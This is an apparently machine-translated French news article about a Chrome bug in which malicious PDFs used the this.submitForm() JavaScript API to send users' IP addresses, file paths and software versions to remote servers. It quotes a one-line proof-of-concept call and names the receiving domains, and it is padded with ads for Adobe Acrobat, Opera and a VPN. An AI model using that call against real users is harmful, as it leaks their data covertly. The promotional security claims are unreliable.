Un bug de Chrome permet aux pirates de collecter des données utilisateur via des fichiers PDF

How to effectively deal with bots on your site? The best protection against click fraud.
  • EdgeSpot a découvert une vulnérabilité zero-day intrigante exploitant des documents PDF dans Chrome.
  • Cette vulnérabilité peut vous nuire en récoltant les données sensibles sur votre PC.
  • Découvrez notre Page Web & Cloud pour plus d'informations sur d'autres outils et services.
  • Si vous êtes intéressé par les navigateurs, nous fournissons de nombreuses informations à leur sujet dans notre Hub des navigateurs.
Un bug de Chrome permet aux pirates de collecter des données utilisateur à partir de vos fichiers PDF
Et si vous utilisiez le meilleur gestionnaire de documents ?
Rendez tous vos documents accessibles et sécurisés grâce à Adobe Acrobat Reader. Cet outil de gestion de documents vous permettra également de signer électroniquement et de créer des formulaires officiels pour vous faire gagner du temps au travail. Obtenez-le pour votre PC et vous pourrez :
  • Ouvrez, imprimez et modifiez tous vos fichiers PDF et autres types de fichiers
  • Remplir les formulaires PDF plus facilement
  • Gardez vos documents essentiels cryptés

Obtenez toutes les applications à un prix spécial !

Le logiciel de gestion de documents n°1 au monde est maintenant à un prix avantageux, alors dépêchez-vous !

instagram story viewer

Le service de détection d'exploits EdgeSpot a découvert un Chrome vulnérabilité zero-day exploitant des documents PDF.

La vulnérabilité permet aux attaquants de récolter des données sensibles en utilisant des documents PDF malveillants ouverts dans Chrome.

Dès que la victime ouvre les fichiers PDF respectifs dans Google Chrome, un programme malveillant commence à fonctionner en arrière-plan en collectant des données utilisateur.

Les données sont ensuite transmises au serveur distant contrôlé par les pirates. Vous vous demandez peut-être quelles données sont aspirées par les attaquants, ils ciblent les données suivantes sur votre PC :

  • adresse IP
  • Chemin complet du fichier PDF sur le système
  • Versions du système d'exploitation et de Chrome

Méfiez-vous des fichiers PDF infectés par des logiciels malveillants

Experts Pointé que l'un des deux domaines readnotify[.]com ou alors collaborateur burp[.]net recevait les données.

Ils ont révélé que les attaquants utilisaient le this.submitForm() API Javascript PDF pour collecter les informations sensibles des utilisateurs.

Nous l'avons testé avec un PoC minimal, un simple appel API comme this.submitForm(‘ http://google.com/test’) obligera Google Chrome à envoyer les données personnelles à google.com.

Ce bug de Chrome était exploité par deux ensembles distincts de fichiers PDF malveillants, tous deux diffusés en octobre 2017 et septembre 2018, respectivement.

Notamment, les données collectées peuvent être utilisées par les attaquants pour affiner les attaques à l'avenir. Les rapports suggèrent que le premier lot de fichiers a été compilé à l'aide du service de suivi PDF de ReadNotify.

Les utilisateurs peuvent utiliser le service pour garder une trace des vues des utilisateurs. EdgeSpot n'a partagé aucun détail concernant la nature du deuxième ensemble de fichiers PDF.

Petite astuce: remplacez votre navigateur par Opera

En ces temps troublés, nous sommes attaqués par des logiciels malveillants, du phishing et des chevaux de Troie à chaque étape, nous devons donc être beaucoup plus vigilants et rester protégés.

Et comme il s'agit d'un problème spécifique à Chrome, vous pouvez éviter cette menace et toutes les autres avec un navigateur orienté sécurité comme Opéra.

Ce navigateur est livré avec un bloqueur de publicités intégré qui non seulement efface ces distractions, mais bloque également des scripts d'analyse, des pixels de suivi et des méthodes pour collecter vos données.

Et si vous voulez être absolument sûr de rester à l'écart de tout danger, placez-vous derrière le VPN service 100 % gratuit à utiliser pour une durée illimitée.

Opéra

Opéra

Opera offre la protection parfaite contre les menaces avec le bloqueur de publicités intégré et le service VPN gratuitement !

Obtenir gratuitement
Visitez le site Web

Comment puis-je rester protégé contre les vulnérabilités PDF ?

Télécharger Adobe Acrobat PRO

Adobe Acrobat PRO

Adobe et Chrome font bon ménage lorsqu'il s'agit de gérer les fichiers PDF. En installant l'extension Adobe pour Chrome, vous pouvez réviser et manipuler des fichiers PDF à votre guise sans quitter votre navigateur préféré.

Malgré sa structure robuste, les logiciels malveillants cachés dans les fichiers PDF peuvent ne pas être détectés si vous utilisez la version standard du Reader.

La version professionnelle est recommandée pour garantir votre protection et garder vos données à l'abri des pirates.

Bien que ce ne soit pas gratuit, le prix que vous paierez est plutôt faible pour la pléthore de fonctionnalités supplémentaires que vous apprécierez, notamment la sécurité renforcée de vos fichiers PDF.

Un essai gratuit de 7 jours est également inclus afin que vous puissiez avoir un avant-goût de l'expérience Pro complète avant de faire l'achat.

Adobe Acrobat PRO

Adobe Acrobat PRO

Éloignez-vous des logiciels malveillants en téléchargeant Adobe Acrobat PRO. Il a beaucoup plus de fonctionnalités que la version gratuite et protège vos données.

Essai gratuit
Visitez le site Web

Si vous souhaitez être en sécurité lorsque vous surfez sur Internet, vous aurez besoin d'un outil entièrement dédié pour sécuriser votre réseau. Installer l'accès Internet privé maintenant et sécurisez-vous. Il protège votre PC des attaques lors de la navigation, masque votre adresse IP et bloque tous les accès indésirables.

Le service de détection d'exploits EdgeSpot souhaitait alerter les utilisateurs de Chrome sur les risques potentiels car le correctif ne devait pas être publié dans un avenir proche.

EdgeSpot a signalé à Google la vulnérabilité l'année dernière et la société a promis de publier un correctif fin avril.

Cependant, vous pouvez envisager d'utiliser une solution de contournement temporaire au problème en affichant localement les documents PDF reçus à l'aide d'une autre application de lecture.

Alternativement, vous pouvez également ouvrir vos documents PDF dans Chrome en déconnectant vos systèmes d'Internet.

Questions fréquemment posées

  • Oui. Mais si vous voulez un choix plus large, explorez nos meilleurs choix pour Chromeintimité extensions dans ce guide complet.

  • Tvoici de nombreuses extensions qui permettent PDF En traitement. Vérifier sur notre excellent guide sur les meilleures extensions PDF pour Chrome.

  • Ce n'est pas le cas, mais vous pouvez l'activer rapidement. Voici notre guide complet sur la façon d'activer le générateur de code QR dans Chrome.

Teachs.ru
Le plugin de remplissage automatique de LinkendIn aurait divulgué des données utilisateur

Le plugin de remplissage automatique de LinkendIn aurait divulgué des données utilisateurLinkedinLa Cyber Sécurité

Microsoft acheté LinkedIn en 2016 et jusqu'à présent, il n'y a eu aucun problème avec le service. Vous avez peut-être trouvé le plugin LinkedIn AutoFill utile, mais il semble qu'il y ait plus que c...

Lire la suite
De nombreux ordinateurs sont toujours infectés par le ransomware Wannacry

De nombreux ordinateurs sont toujours infectés par le ransomware WannacryRansomwareWannacry RansomwareLa Cyber Sécurité

Saviez-vous qu'il y a encore beaucoup, beaucoup d'ordinateurs qui sont encore infectés par le Wannacry ransomware? Je dois admettre que c'était une nouvelle pour moi quand je l'ai lu pour la premiè...

Lire la suite
Comment activer TPM 2.0 dans différentes versions du BIOS

Comment activer TPM 2.0 dans différentes versions du BIOSTpmWindows 11La Cyber Sécurité

Le TPM est une exigence de Windows 11, il est donc important de savoir comment activer le TPM 2.0 à partir du BIOS.Le processus est simple et presque le même pour les appareils AMD et Intel.En acti...

Lire la suite
ig stories viewer